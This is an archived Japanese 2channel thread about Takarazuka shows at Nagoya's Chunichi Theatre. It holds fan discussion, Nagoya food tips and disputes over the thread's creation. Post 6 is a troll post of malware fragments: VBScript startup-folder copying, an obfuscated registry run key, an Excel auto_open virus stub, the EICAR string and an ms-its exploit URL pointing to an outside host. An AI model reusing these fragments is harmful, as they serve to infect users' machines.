5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宝塚 ★中日劇場公演★

1 :名無しさん@花束いっぱい。:2006/10/19(木) 18:58:36 ID:RriUlfgG
2月の名古屋は宝塚歌劇でHOOT!!に。
中日劇場公演について、マタ〜リ語りましょう。

2 :名無しさん@花束いっぱい。:2006/10/19(木) 19:00:44 ID:RriUlfgG
2007年2月2日(金)〜2月25日(日) 一般前売:2006年12月2日(土)

ミュージカル・ロマン
『星影の人』−沖田総司・まぼろしの青春−
作・演出/柴田侑宏 演出・振付/尾上菊之丞

ダンシング・レビュー
『Joyful!!II』
作・演出/藤井大介

3 :名無しさん@花束いっぱい。:2006/10/19(木) 19:02:54 ID:RriUlfgG
『星影の人』 〔解 説〕
1976年、汀夏子主演により雪組で上演され、好評を博した日本物の名作の初の再演。
新撰組にまつわる数々のエピソードの中でも、殆ど語り継がれていない沖田総司の恋物語に焦点を当て、
虚実織り交ぜながら、その短くも激動の青春を、爽やかに、そして哀しく謳いあげます。

幕末の動乱期。勤皇佐幕両派が相争っていた頃。
沖田総司は、新撰組副長助勤筆頭、一番隊組長の位置にあった。
文久四年の夏。祇園の一角で、激しい斬り合いの音がする。
沖田が七、八人の浪士を相手にしていたのだ。帰り路を急ぐ沖田に雨が降りかかる。
そこへ傘をさした芸妓玉勇が通りかかる。
「傘をお持ちやすのか」と聞く玉勇にかぶりを振る沖田。
玉勇は、新撰組の沖田という名前を聞いて、何か心に残るものがあった。

壬生の新撰組の屯所に、町人姿に身をやつした山崎丞が、桂小五郎の居所を突き止めたと駆けつけてくる。
さっそく組長の土方歳三や沖田を先頭に、祇園の小料理屋へと向かう。
祇園の街角。虚無僧姿の桂が足に怪我をして逃げてくる。その前に立ち塞がる沖田。
二人は、まだ沖田が江戸にいた頃、ある道場で手合わせをしていた。
沖田は、怪我を負っている桂に敢えて剣を抜かなかった。
桂を見送った沖田は、偶然にも玉勇と再会する。
そのまま別れてしまうに忍びぬ二人は、あくる日の午後、会う約束をついしてしまう。
約束の場所、建仁寺の境内には、すでに一組の男女がしのび逢っていた。
同じ新撰組総長の山南敬助と遊女明里であった。
二人が散策しているところへ沖田がやってくる。
山南は新撰組のあり方に疑問を抱いているのだと、沖田に心中を吐露する。
山南たちが立ち去るのを見届けた玉勇が、沖田に声を掛ける。
「ただ話をしたいと思うただけどしたのに、何やのめりこんでいきそうどす」。
いつしか二人は、淡い恋心を抱いていた。

その翌日、鴨川べりで新撰組が宴を催していた。この宴を狙って、刺客が乗り込んで来た。
迎え討つ沖田は、立ち回りの最中にひどいめまいに襲われる。肺が冒されていたのだ。
沖田は血を吐いて倒れる。 自分の病状を医師に問いただす沖田。
「あと二年の命か…懸命に隊のために働こう。忙しくなるぞ」沖田は自らを奮い立たせる……。

4 :名無しさん@花束いっぱい。:2006/10/19(木) 19:03:56 ID:RriUlfgG
『Joyful!!II』

〔解 説〕
2003年に宝塚大劇場、東京宝塚劇場で上演されたショー作品のリバイバル。
美しい音楽を奏でてくれる「楽器」にスポットを当て、それぞれの「楽器」から受けるイメージを膨らませた、
華やかでファンタスティックなダンシング・レビュー。

5 :名無しさん@花束いっぱい。:2006/10/19(木) 19:05:58 ID:RriUlfgG
公式に、ミズ沖田がアップされたお(・∀・)ノ


6 :<body onload=window()>:2006/10/19(木) 20:19:42 ID:usOnQJRX
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :名無しさん@花束いっぱい。:2006/10/20(金) 01:06:30 ID:8VFoN18s
ID:RriUlfgGって、例の香ばしいミズファン?
雪スレで嫌味ったらしいレスつけてるよね。

8 :名無しさん@花束いっぱい。:2006/10/20(金) 01:17:50 ID:Frco1YdZ
中日や日生、DCに全ツ等のスレって、スレ立て検討がペンディングになってた筈。
新スレ設置相談室に行かずに、いきなりスレたてちゃったのね。

9 :名無しさん@花束いっぱい。:2006/10/20(金) 01:56:09 ID:4fgbTUFR
勝手にこんなスレ立てるなよ、全く。

10 :名無しさん@花束いっぱい。:2006/10/20(金) 04:08:00 ID:DClGOllM
それより誰も>>1
HOOT
を突っ込まないのか?

11 :名無しさん@花束いっぱい。:2006/10/20(金) 08:04:03 ID:M+NpTcg2
hoot
━━ v., n. やじる(声) ((at)) (〜 down やじり倒す; 〜 off [out, away] やじって追出す);
(フクロウが)ホーホーと鳴く(声); (汽笛・らっぱの)鳴る(音) ((at));
つまらぬもの; ((否定文で)) 少しも (do not care a 〜 [two 〜s]);
〔話〕 大笑い(する).

hoot・er
━━ n. 汽笛, サイレン; やじる人; フクロウ; 〔英俗〕 鼻

12 :名無しさん@花束いっぱい。:2006/10/20(金) 08:27:20 ID:77YEQz/e
公式みてきたけど、ミズ沖田なかなかいいね。
日本物メイクもきれいだった。

更新された解説によると、総司のほかに、新撰組隊士の土方、山南、山崎、
長州の桂、玉勇、明里の名前が出てた。
初演を観てないから、どんな感じになるのか分からないけど
男役の役が多めなのかな?


13 :名無しさん@花束いっぱい。:2006/10/20(金) 09:13:39 ID:dBNiY9d3
すごいな。
水ファン、やりたい放題。

14 :名無しさん@花束いっぱい。:2006/10/24(火) 01:51:31 ID:OjbSgUNE
スレ落ちもないし、とりあえず新スレ相談室に行ったらどうだろう。
たてたもん勝ちで使っちゃうってのは、これだから○ファンは・・・的ネタになるし。

外部劇場公演スレも、以前は某ヲタさんが騒いでたので皆ちょっとひいて
しばらく様子見しましょうみたいな雰囲気が相談室にはあったけれど、
今なら検討話も進むんじゃないだろうか。

15 :楽しみ:2006/11/29(水) 18:20:13 ID:lr2za/ZT
土方は?誰なんだろう。
集合日が、待ち遠しい。

16 :名無しさん@花束いっぱい。:2006/12/26(火) 10:33:32 ID:8em8Tgy+
age

17 :名無しさん@花束いっぱい。:2006/12/26(火) 11:23:21 ID:WSqNkBLa
雪組中日公演Romance de paris/レ・コラージュのDVDってないんですか?

18 :名無しさん@花束いっぱい。:2006/12/26(火) 11:30:18 ID:L7JDjvBv
ないよ。CSでOAされたかなー

19 :名無しさん@花束いっぱい。:2006/12/26(火) 16:01:32 ID:GM8Jv996
>>17
主演者が同じ場合は再演物はDVD化されないらしいよ。


20 :名無しさん@花束いっぱい。:2006/12/26(火) 16:03:50 ID:WSqNkBLa
>18,>19
そうなんですか。CSとってないから残念です。
教えていただきありがとうございました

21 :名無しさん@花束いっぱい。:2006/12/27(水) 17:35:13 ID:GgSLqjSk
配役発表まだかな〜

22 :名無しさん@花束いっぱい。:2006/12/27(水) 20:42:00 ID:zL1BrJX0
個人的希望&妄想でw

土方    かなめ
桂     ゆみこ
山南   ひろみ
源三郎  組長
近藤   ハマコ






23 :名無しさん@花束いっぱい。:2006/12/28(木) 12:54:57 ID:UB991S8t


24 :名無しさん@花束いっぱい。:2006/12/28(木) 13:53:16 ID:FbmgV1tV
このスレをたてた>>1、本日のIDはID:L/mlKhsd

25 :名無しさん@花束いっぱい。:2006/12/28(木) 13:59:50 ID:1BOwwLqA
自分でブログ作ってやれば良いのに。迷惑。

26 :名無しさん@花束いっぱい。:2006/12/28(木) 16:09:46 ID:L/mlKhsd
スレ立てできる人がうらやましい本人ですけど。

27 :名無しさん@花束いっぱい。:2006/12/28(木) 17:48:07 ID:0GCvFavS
中日劇場スレできたんだ。

昔、新スレ相談室で作るか議論したことあったよね。
名古屋のならではの美味しいものとか土産とか、交通手段とか
地方公演ならではの情報交換に有用だと思う。

28 :名無しさん@花束いっぱい。:2006/12/28(木) 20:25:36 ID:KpyH15zu
水ファンが勝手にたてて、新スレ相談室で決めてきたらと言われてもシカトしてるんだよ。

29 :名無しさん@花束いっぱい。:2006/12/28(木) 20:33:51 ID:L/mlKhsd
24、25、28
マジレスですが、落としたかったら、
ご自分たちも書き込まないのが一番いいのでは?

30 :名無しさん@花束いっぱい。:2006/12/28(木) 21:03:54 ID:FrqRtIRY
この板じゃ、もうこのスレは落ちないよ。

31 :名無しさん@花束いっぱい。:2007/01/07(日) 22:18:44 ID:Z4RtN9dj
皆さん、中日公演の演目は星影だけではないですよ。
ジョイ2のほうはどうなるのかご存知の方いらっしゃいますか?
壮・立樹・音月でやっていた場面は残っているんでしょうかね?
あとコーラス隊は何人なのか?
かなりいろいろ気になってます。

32 :名無しさん@花束いっぱい。:2007/01/29(月) 03:10:24 ID:3j7ie4hs
もうすぐ初日だから

33 :名無しさん@花束いっぱい。:2007/02/02(金) 00:14:57 ID:dEf7OIsR
なにこのスレ

34 :名無しさん@花束いっぱい。:2007/02/02(金) 10:20:08 ID:nf2FCr6t
初日おめでとう
ageます

35 :名無しさん@花束いっぱい。:2007/02/02(金) 11:26:26 ID:r8C0ye2y
名古屋は雪が降らず、晴れです。
気温は低いものの風もなく
良い初日となりました。

36 :名無しさん@花束いっぱい。:2007/02/02(金) 13:44:20 ID:KXoZ7MGb
おめでとうございます。
中日劇場限定で、雪組おでんが売られるそうですよ。
○▽□− 







本気にしてくれた?

37 :名無しさん@花束いっぱい。:2007/02/02(金) 17:51:08 ID:H63rySEu
立ったものは使うべし

38 :名無しさん@花束いっぱい。:2007/02/02(金) 20:03:11 ID:gQ1cn2ZB
無駄だとオモ
水ファンはどうか知らないけど、雪って公演中の劇場スレには
書き込まない性質っぽい。
コム時代、東宝スレに書き込まれたレス数なんて数える程だし。

39 :名無しさん@花束いっぱい。:2007/02/02(金) 22:00:45 ID:7Ama3ZGY
こういうスレがあるって、知らないだけじゃないの?
私も今日まで気づかなかったよ。

40 :名無しさん@花束いっぱい。:2007/02/02(金) 22:05:33 ID:ITZjhvaQ
これ立てたのミズファンなんだけど。

41 :名無しさん@花束いっぱい。:2007/02/02(金) 23:24:11 ID:dEf7OIsR
中日も売れてないけど、エリザツアーも売れてないんだね。
お披露目なのに中部発のツアーが人数集まらず中止!
超恥ずかしい上劇団的には水への印象マイナスポイントだねwww
「劇団から怒られちゃうから買って下さい」って、お茶会でファンに頼めばいいのに。
それかイメガの古嫁に頭下げてなんとかしてもらえば?
その辺上手にやればいいのに。
たかこにしっかり学んだ2代目婿トップだろwww
そんな情けない結果が出てるのに初日挨拶で「今年の雪組はすごいですよ!」だ?
寝言は寝てから言え!!

42 :名無しさん@花束いっぱい。:2007/02/02(金) 23:27:07 ID:f0Me9nrt
ID:dEf7OIsR
今日もあちこちコピペですか。
よほど暇なんだね。


43 :名無しさん@花束いっぱい。:2007/02/03(土) 00:48:12 ID:WRNXHdBL
中日、せまっくるしいし暗い。生徒がジャンプしたら客席が揺れたのは気のせいか?

44 :名無しさん@花束いっぱい。:2007/02/03(土) 01:02:25 ID:o8DZVRNg
せっかくの中日スレだから、名古屋のグルメ処も教えてほしい〜。

45 :名無しさん@花束いっぱい。:2007/02/03(土) 01:22:32 ID:sHuPp3ix
博多座もあるし中日スレがあってもいいんじゃない?
今日(昨日か)はじめていってきました。
劇場自体はちょっと古目だけどこぢんまりしててみやすかった。
ただ、エレベーターがなかなかこなくてすごく困ったです。
あと駅の案内も非常にみにくい。(栄駅に限らず全体的にみずらかった)
時間に余裕をもって行動するのをおすすめします。

46 :名無しさん@花束いっぱい。:2007/02/03(土) 01:33:44 ID:BlCVU/qV
スレがあってもいいかどうか新スレ相談室で決めてきたらと言われてるのに、
勝手にスレたてしたミズファンが知らん顔してるのが無責任だって話。

47 :名無しさん@花束いっぱい。:2007/02/03(土) 01:38:16 ID:i/+KiMuN
リング状のあったかいブリオシュの上にソフトクリームが乗っていて
シロップをかけてるスイーツが食べられるチェーン店の喫茶店て
中日ビルの近くにありますか?

48 :名無しさん@花束いっぱい。:2007/02/03(土) 01:41:40 ID:PcrLvKh/
すごいな。
水ファン、やりたい放題。

49 :名無しさん@花束いっぱい。:2007/02/03(土) 02:54:03 ID:t3+NqG0D
水さんはじめ、新生雪組の中日楽しみです♪
もうごらんになった方たちの、ツボなどもお教えくださいませ。
あと、名古屋の方たちには、グルメ処も教えてほしい!
「もしもあなたが一晩、ご贔屓を連れて名古屋で食事をするならどこですか?」

50 :名無しさん@花束いっぱい。:2007/02/03(土) 06:48:28 ID:3o+DUPfw
中日ビル地下のひつまぶしの店

51 :名無しさん@花束いっぱい。:2007/02/03(土) 08:53:32 ID:hrUAElGO
たてたもん勝ちミズファン。
板のルールも守れない自己中っぷり。

52 :名無しさん@花束いっぱい。:2007/02/03(土) 10:40:06 ID:885Euylf
>47
コメダですね。検索してみてください。

53 :名無しさん@花束いっぱい。:2007/02/03(土) 10:44:23 ID:WRNXHdBL
>49
ツボは…
百聞は一見にしかず!ですよ。

54 :名無しさん@花束いっぱい。:2007/02/03(土) 10:53:15 ID:VuiU12qW
スレ使うなら、相談室でちゃんと決めてきたら?
なし崩し的に使っちゃうのはよくないよ。

55 :名無しさん@花束いっぱい。:2007/02/03(土) 14:24:07 ID:kioLqODU
>49
終演後、いつも友達と近場の「山ちゃん」にいくけど、
贔屓となら池下の「黒牙」・八事の「ヤゴト千歳」あたりお勧め。
唯、名古屋は夜が早いので(閉店時間)、東新町から高速で30分
程の阿久比の「今人」は如何?予約制で365日24時間OKですよ。
全て箸で頂けるフレンチです。

56 :名無しさん@花束いっぱい。:2007/02/03(土) 14:28:14 ID:kioLqODU
55です。
ヤゴト千歳は和食+ワインでした。ハウスワインの白がお勧めです。

57 :名無しさん@花束いっぱい。:2007/02/03(土) 15:54:55 ID:3kCKJwks
名古屋といえば手羽先!!
やっぱり世界の山ちゃんがいいですよ。
でも、大衆むきだからあんまりおしゃれなかんじはしないですよ。
それか中日劇場の地下のみそにこみの山本屋も有名ですよ。
それか、味噌カツ食べたかったらラシックの上の矢場とんがいいですよ。
おしゃれな居酒屋とかなら、名駅よりも栄のほうがあるからその辺でなんか見つけてください。
なんでこんだけ親切に教えてるんだろう。

58 :名無しさん@花束いっぱい。:2007/02/03(土) 20:10:31 ID:Qab47GXc
名駅地下のシャポーなんとか?のモーニング

59 :名無しさん@花束いっぱい。:2007/02/03(土) 20:43:28 ID:fbIU1jrq
>>58
シャポーブラン

60 :名無しさん@花束いっぱい。:2007/02/03(土) 21:37:27 ID:3o+DUPfw
シロノワール

61 :名無しさん@花束いっぱい。:2007/02/03(土) 23:13:06 ID:e097Z8lv
>>57
山本屋本店(中日地下)と山本屋総本家(大須)は、
どちらの味噌煮込みうどんが好みですか?

62 :名無しさん@花束いっぱい。:2007/02/04(日) 00:07:11 ID:RzntszuD
49です♪
>53さん そうですよね、おっしゃるとおりです〜。
でも、まだ1週間ちょっと、この悶々とした状況が続くので
とにかく、何でも、情報を伺いたかったんです。。。
そして、55からのみなさん! ご親切にありがとうございます♪
ひつまぶしも、お箸でいただけるフレンチも気になります!
あああ、早くみたいです〜! 

63 :名無しさん@花束いっぱい。:2007/02/04(日) 00:09:20 ID:ktvN0NrH
やりたい放題、自己中ミズファン。
自分達さえよければそれでいいのか。

64 :名無しさん@花束いっぱい。:2007/02/04(日) 01:12:57 ID:iqpZDogy
>61
山本屋総本家は、栄にもありますよ。中日劇場から歩けたはず。
どちらかはお漬物がおかわりし放題なんですよね。

65 :名無しさん@花束いっぱい。:2007/02/04(日) 01:30:31 ID:jako/BrX
>62さん
53です。突き放す感じだったかなー
沖田のはかなげさ、玉勇の艶やかさ、土方の重厚さ、立回り場面が私のつぼ。
ショーはJoyfulの合唱、ベースの場面。次回も楽しみ

66 :名無しさん@花束いっぱい。:2007/02/04(日) 21:28:48 ID:6X1/eFHU
ところで、中日ってサバキあります?
午前中のチケを確保していて、おもしろかったら午後も
観たい、と思ってるんですが…。あ、平日です。

67 :名無しさん@花束いっぱい。:2007/02/04(日) 21:53:19 ID:GZepty12
>66
平日なら、中日劇場のHPを見た限りじゃ、夜の部は結構チケットが残ってるから大丈夫では?
気になるなら、自分で該当日のHPをチェックすれば?

68 :名無しさん@花束いっぱい。:2007/02/04(日) 22:19:30 ID:jILF23ra
>65さん♪
62です!
いえいえ…舞台見られるその日まで悶々とするのもシアワセです。
沖田のはかなげさも、玉勇の艶やかさも、土方の重厚さも楽しみ!
ありがとうございました!

69 :66:2007/02/04(日) 23:40:13 ID:6X1/eFHU
>>67
いや、もう残っている席は端っこしかないから、
ひょっこりサバキでもう少し良い席が出ていたり
しないもんかなぁ、とおもったんですわ。
遠征するのに中日HPも見ないで行くような
無計画者では有りませんw

70 :名無しさん@花束いっぱい。:2007/02/04(日) 23:46:24 ID:cusGwpNo
>69
中日公演は毎年平日は意外とサバキが少ないよ。
観たい人が観たい分だけチケットを買ってる感じ。
でも中日って端っこの席でも、
大劇場ほど逆側が見えなかったりってことは無いような気が。
まあ、音響は最悪だけどね>端っこ

71 :名無しさん@花束いっぱい。:2007/02/04(日) 23:53:02 ID:0vpcOcvE
14 名前:名無しさん@花束いっぱい。 投稿日:2006/10/24(火) 01:51:31 ID:OjbSgUNE
スレ落ちもないし、とりあえず新スレ相談室に行ったらどうだろう。
たてたもん勝ちで使っちゃうってのは、これだから○ファンは・・・的ネタになるし。

外部劇場公演スレも、以前は某ヲタさんが騒いでたので皆ちょっとひいて
しばらく様子見しましょうみたいな雰囲気が相談室にはあったけれど、
今なら検討話も進むんじゃないだろうか。

72 :名無しさん@花束いっぱい。:2007/02/05(月) 00:09:03 ID:JY8bZa5Q
>>70タソ、ありがとうございます。
では、中日劇場へお電話することに致します。
初一人遠征、頑張ってきます!

73 :名無しさん@花束いっぱい。:2007/02/05(月) 01:28:32 ID:o1FLbhfw
名古屋といえばモーニングですが、オススメのモーニングのお店(栄)を教えてほしいです。

74 :名無しさん@花束いっぱい。:2007/02/05(月) 01:56:03 ID:pakecUXF
モーニングってねぇ、そんな街中じゃなくって、
市外の喫茶店の方がいろいろついてきていいんだわ。
栄なんてコーヒー高いし、そんなところでモーニング食べないし・・・
普通はモーニングって飲み物注文したら勝手にタダでついてくるもんなんだけど、
栄だと「モーニングセット」ってやつでコーヒー代+αになるよ。

75 :名無しさん@花束いっぱい。:2007/02/05(月) 18:09:55 ID:UVWJdWip
中日は、何処泊まってるの?
ホテル住まいは、大変だ!

76 :名無しさん@花束いっぱい。:2007/02/05(月) 19:54:31 ID:s3ePWHZo
今日、見てきました。2年振りの中日です。
緞帳を使ってないんですね。最近の中日劇場はそうなの?
床に立ち位置の番号を張ってなかった。そんなことあるのかな、ヅカで。
ただの見落としかしら。
観劇の前後に、蓬莱軒と山本屋本店も寄りました。ウマー

77 :名無しさん@花束いっぱい。:2007/02/08(木) 00:42:20 ID:JUr6VTCV
すみませんが、ひとつ質問させて下さい。
中日劇場さん、たまに通路横に補助席出てることありますよね?
今回も出ていますか?

78 :名無しさん@花束いっぱい。:2007/02/08(木) 23:40:36 ID:Qf5187Vh
客席降りがあるから補助席ないのでは?

79 :名無しさん@花束いっぱい。:2007/02/09(金) 01:24:03 ID:OOZFNcoO
以前のグラフで、水さんがまたがってたラクダは、どこにありますか?

80 :名無しさん@花束いっぱい。:2007/02/09(金) 01:30:43 ID:2zP/pqv4
アラビアンロックかね?
それだったら地下の1番出口を出て、観覧車とオンチッチって言う1階がゲーセンの間の道を真っ直ぐ行くとあるよー!
分かりにくくてすまんぜよ

81 :名無しさん@花束いっぱい。:2007/02/09(金) 02:48:13 ID:XzNoD+TS
矢場とん( ゚Д゚)ウマーです

82 :名無しさん@花束いっぱい。:2007/02/09(金) 22:31:45 ID:AK9Hd8+Y
スレを使うなら、相談室でちゃんと決めてきたら。

知らぬ存ぜぬの自己中っぷりを晒してるわけだが。

83 :名無しさん@花束いっぱい。:2007/02/10(土) 00:38:39 ID:0/CUbf7k
80

ありがとうございました。

84 :名無しさん@花束いっぱい。:2007/02/10(土) 05:06:43 ID:eem1QjmV
1階のエレベーターホールで、並んで行ってらっしゃーいって、やってますか?

85 :名無しさん@花束いっぱい。:2007/02/10(土) 05:25:31 ID:bs8B9r0h
やってるよ

86 :名無しさん@花束いっぱい。:2007/02/10(土) 09:32:03 ID:k3Q+bN6a
朝日新聞で雪組中日のことが出てたらしいのですが何日のものですか?

87 :名無しさん@花束いっぱい。:2007/02/10(土) 10:28:09 ID:855vxhmS
>>84
9:50頃、とな&シナ&かぐや&あんな団体様で楽屋入り
みんなカワユス(*´д`)ハアハア
で、おいらはサンモリッツでモーニング中

88 :名無しさん@花束いっぱい。:2007/02/10(土) 15:20:18 ID:855vxhmS
昼の部カーテンコール
水「皆様の暖かい拍手とひつまぶしとみそかつのお陰でパワー全開です」

89 :名無しさん@花束いっぱい。:2007/02/10(土) 23:49:54 ID:5yegcOgE
>86
木曜朝刊

90 :名無しさん@花束いっぱい。:2007/02/11(日) 11:40:50 ID:CpAc62wH
中●スポーツは初日だけですか?
劇場じゃもう買えないですよね…orz


91 :名無しさん@花束いっぱい。:2007/02/13(火) 22:21:42 ID:gA0dnan+
組スレ荒れてるからこっち上げておきます。
公演話をしたい人はこっちへよろしく。


92 :名無しさん@花束いっぱい。:2007/02/13(火) 22:24:09 ID:OnfX3lGx
板内で合意もとれてないのに、勝手に使うなって・・・

93 :名無しさん@花束いっぱい。:2007/02/13(火) 22:32:22 ID:8JwDphN2
コムガイチ来場記念age

94 :名無しさん@花束いっぱい。:2007/02/13(火) 22:34:44 ID:gA0dnan+
作ってしまって削除もされてないんだから
有効に使って何が悪い。


95 :名無しさん@花束いっぱい。:2007/02/13(火) 22:42:30 ID:JRs1Me0b
いくらなんでもちょっとそれはヒドくないか。
サーバ資源は効率よく使おうと、板住人で検討して決めてきたローカルルールは
今だって通用してると思うんだが。

96 :名無しさん@花束いっぱい。:2007/02/14(水) 11:07:42 ID:zRziQklB
削除されないからよいって…すごい言いぐさですな。
自己中もここまで酷いと、返す言葉が無くなりますw

97 :名無しさん@花束いっぱい。:2007/02/15(木) 09:25:23 ID:m5x9RmVo
>>93
ガイチさんも来たんだ〜

98 :名無しさん@花束いっぱい。:2007/02/25(日) 09:36:35 ID:INMTaAO6
今日の出の時間わかりますか?

99 :名無しさん@花束いっぱい。:2007/02/25(日) 11:54:55 ID:6LTRX2Y2
組スレへどぞー

100 :名無しさん@花束いっぱい。:2007/02/25(日) 23:29:18 ID:adwPDpSY
千秋楽アゲ↑↑
お疲れ様ーm(_ _)m

101 :名無しさん@花束いっぱい。:2007/02/25(日) 23:59:17 ID:afZXbtLg
名駅地下「矢場とん」に水が来た
食べながら終始、味噌カツが濃いとかブツブツ言ってた。

102 :名無しさん@花束いっぱい。:2007/02/26(月) 01:01:25 ID:cz/JSeAG
↑水はホテルで食事だったから、いないから…

103 :名無しさん@花束いっぱい。:2007/02/26(月) 20:59:53 ID:PLmdOm5E
ワロタ

104 :名無しさん@花束いっぱい。:2007/02/26(月) 21:08:18 ID:PLmdOm5E
中日ちかちゃんの茶会の本当の人数は1200じゃなく1300

105 :名無しさん@花束いっぱい。:2007/03/15(木) 14:38:06 ID:02rg10uf
自分勝手な水ファンが傲慢っぷりを晒してるは
このスレですか?

106 :名無しさん@花束いっぱい。:2007/04/05(木) 21:09:01 ID:zdhTYHxj
haruタソに会えるかな?
楽しみ。

107 :名無しさん@花束いっぱい。:2007/06/19(火) 19:20:10 ID:n0p4a/p8






                   ┃2006.03 ナヌムの家報道、NEWS23スポンサー不買運動
                   ┃2006.04 大家族・青木家、あざみに数々の疑惑が浮上
                   ┃2006.05 白インゲンダイエットで下痢や嘔吐などの入院患者100人超
                   ┃2006.06 ハイド議員の靖国発言を超訳
                   ┃2006.07 731部隊の報道に安倍氏ポスターをカットイン
                   ┃2006.08 亀田疑惑の判定で世界王者、抗議6万件超
                   ┃2006.09 亀田大毅の判定に客が野次を飛ばし乱闘騒ぎに
                   ┃2006.10 新キャスター・山本モナさんが民主・細野議員との不倫で降板
                   ┃2006.11 世界バレー女子、6位・日本からのMVP選出に大ブーイング
                   ┃2006.12 はなまるマーケットで便器破損の恐れがあるトイレ掃除法を紹介
                   ┃2007.01 反則の柔道王・秋山成勲がヌルヌル&グローブ疑惑で失格処分
                   ┃2007.02 頭のよくなる音・ハイパーソニック音で過剰表現・論文無断使用
        .∧_∧  ミ 。┃2007.02 サンデー・ジャポンで柳沢発言を不適切編集
今ここ!>( `(・・)´) / ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━
       ( T豚S つ











108 :名無しさん@花束いっぱい。:2007/08/14(火) 10:40:58 ID:2vCqCuJN
age

109 :名無しさん@花束いっぱい。:2007/10/30(火) 00:35:13 ID:9ks322Zi
はがき申し込み分は、どれ位当たるんだか…

110 :名無しさん@花束いっぱい。:2007/10/30(火) 14:48:14 ID:C9gLWCV7
ほぼ確実。
でも一回しか見なくていいやって人にしか通用しないのが難点かなー。
平日しかないしね。

111 :109:2007/11/08(木) 10:43:25 ID:hqCMwL7/
はがき先行、初日が当たりました。

112 :名無しさん@花束いっぱい。:2008/01/02(水) 23:31:58 ID:P+ehxrjo
てすと

113 :名無しさん@花束いっぱい。:2008/01/06(日) 01:47:30 ID:IbkbH8kp
te

114 :名無しさん@花束いっぱい。:2008/01/20(日) 07:24:24 ID:i7ojJdgY
保守

115 :名無しさん@花束いっぱい。:2008/01/24(木) 21:23:37 ID:8i3166kj







ぬるぽ

116 :名無しさん@花束いっぱい。:2008/01/25(金) 00:37:52 ID:mBvLDShV









>>115
ガッ

117 :名無しさん@花束いっぱい。:2008/01/29(火) 10:10:24 ID:BshaEEzL
名古屋の台湾ラーメンも有名で美味しいよ

118 :名無しさん@花束いっぱい。:2008/01/30(水) 19:10:51 ID:+AV5xyoA
どこにあるの?

119 :名無しさん@花束いっぱい。:2008/01/30(水) 19:23:25 ID:nyW69w3a
今池(千種区)の「味仙」が有名だよ。

120 :名無しさん@花束いっぱい。:2008/01/30(水) 19:55:47 ID:0BP4poac
日曜に中日行って、あんかけスパが食べたい。
どこがイイ?

121 :名無しさん@花束いっぱい。:2008/01/30(水) 20:20:40 ID:nyW69w3a
スパゲティハウスチャオ・中日ビル店(中日ビル地下2階)はどう?

122 :名無しさん@花束いっぱい。:2008/01/31(木) 19:35:40 ID:KkXEh6Kv
>>121タン
トン
行ってみます

123 :名無しさん@花束いっぱい。:2008/02/02(土) 01:59:50 ID:5hqtkBtX
初日記念に上げさせていただきます。

花組ガンガレ!



124 :名無しさん@花束いっぱい。:2008/02/02(土) 17:39:02 ID:ylTTEeGo
レポ待ってます!

125 :名無しさん@花束いっぱい。:2008/02/02(土) 22:15:12 ID:7+SbvPfZ
レポは花組スレにあるから、名古屋グルメ(ランチ、カフェ)紹介するね(中日劇場近く限定)
「コンパル」のカツサンド、ジャーマンカツサンド、エビフライサンド。(中日劇場でも販売してるけど、冷めてるし、お店で名物アイスコーヒーを飲んでアツアツのカツサンドを食べるのが一番。ただし、店内小さいし相席はお約束)
ご飯なら「鈴波」の日替わり定食(お魚の粕漬け専門。かなり美味。行列必須)以上栄地下街
洋食なら中日ビル二階の「とにお」。ここは鉄板焼きコースなら8000円だけど、ランチなら1000円。お店は古いけど穴場で空いてるよ。
天むすなら中日劇場から少し歩くけど松坂屋地下の「天むす」(これ以外の天むすは邪道、持ち帰りもあり。)
ケーキならラシック二階の「ハーブス」普通の大きさの三倍はある。胸やけしても食べる価値あり。(ちなみにラシックはトイレが綺麗。)
あとモーニングは日曜はやってない店が多いかな。
味噌煮込み、鰻、味噌カツ、台湾ラーメン、あんかけスパはガイシュツ。
遠征さん、新生花組を見て楽しんだら名古屋グルメも満喫してね。

126 :名無しさん@花束いっぱい。:2008/02/03(日) 12:16:03 ID:Xi8BP7+2
ケーキのお話で125タソに追加。
ハーブスって名古屋限定なのかな。いろんな百貨店に入ってます。
松坂屋にもありますし。個人的にはミルクレープがおすすめ。

127 :sage:2008/02/03(日) 18:05:28 ID:DcUokurN
今回客席降りはどんな感じですか?

128 :名無しさん@花束いっぱい。:2008/02/03(日) 19:34:18 ID:2Yf18D0t
ショー初めの方でまとぶが一人降り、客席いじりあり?
同じくショー最後の方ででまとぶ以下大勢が客席折あり。
2階席からは全く見えず。

129 :名無しさん@花束いっぱい。:2008/02/03(日) 19:35:49 ID:IxYWR8EP
ショー初めの方でまとぶが一人降り、客席いじりあり?
同じくショー最後の方ででまとぶ以下大勢が客席折あり。
2階席からは全く見えず。

130 :名無しさん@花束いっぱい。:2008/02/03(日) 19:50:14 ID:meid1yTx
グランパスがキャンプにいってる間、中日劇場に専念できるわ!!



131 :名無しさん@花束いっぱい。:2008/02/03(日) 19:52:52 ID:tleAv7Xw
タンザニア

132 :名無しさん@花束いっぱい。:2008/02/03(日) 22:19:28 ID:8FAsit2w
今日、お昼にチャオであんかけスパを食べて、中日観劇。
